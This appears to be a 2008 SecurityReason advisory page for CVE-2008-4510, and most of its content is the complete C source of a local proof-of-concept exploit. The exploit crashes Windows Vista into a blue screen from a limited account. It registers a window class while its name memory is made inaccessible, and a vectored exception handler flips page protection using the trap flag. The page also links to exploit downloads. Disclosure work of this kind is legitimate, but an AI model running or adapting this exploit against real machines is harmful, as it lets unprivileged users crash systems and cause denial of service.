|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4388 CVE : CVE-2008-4510 CWE : CWE-399 SecurityRisk : Low  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Available : Yes
Credit : Defsanguje Published : 10.10.2008
Advisory Content : // ////////////////////////////////////////////////////////////// // Windows Vista BSoD (Access violation) from limited account. // // Tested on Home Premium & Ultimate @ October 05 2008 // ///////////////////////////////////////////////////////////////// #include <stdio.h> #include <windows.h> WCHAR szClass[] = L"BSODClass"; int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo); typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler); pFunc pRtlAddVectoredExceptionHandler; typedef struct { DWORD dwWriteViolation; LPVOID lpAddress; } EXCEPTION_ACCESS_VIOLATION_PARAMS; int main() { WNDCLASSW wc; DWORD dwOldProt; printf("Windows Vista BSoD from usermode/limited account.\n" "Coded by. Defsanguje - October 05 2008\n"); // Setup vectored exception handler. SEH would work also. pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"), "RtlAddVectoredExceptionHandler"); (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler); // Dummy data wc.style = 0; wc.lpfnWndProc = NULL; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hInstance = GetModuleHandle(NULL); wc.hIcon = NULL; wc.hCursor = LoadCursor(NULL, IDC_ARROW); wc.hbrBackground = GetStockObject(HOLLOW_BRUSH); wc.lpszMenuName = NULL; wc.lpszClassName = szClass; VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt); RegisterClassW(&wc); printf("You shouldn't see this"); return 0; } int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo) { static LPVOID lpLastAddress; static DWORD dwOldProt; EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams; switch(lpExceptionInfo->ExceptionRecord->ExceptionCode) { case EXCEPTION_ACCESS_VIOLATION: avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->Excep tionInformation; VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt); lpLastAddress = avParams->lpAddress; // Set trap flag lpExceptionInfo->ContextRecord->EFlags |= 0x100; break; case STATUS_SINGLE_STEP: VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt); break; default: break; } return EXCEPTION_CONTINUE_EXECUTION; ; } References : http://securityreason.com/expldownload/1/4844/1 (Exploit) http://www.securityfocus.com/bid/31570
http://www.milw0rm.com/exploits/6671
http://secunia.com/advisories/32115  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |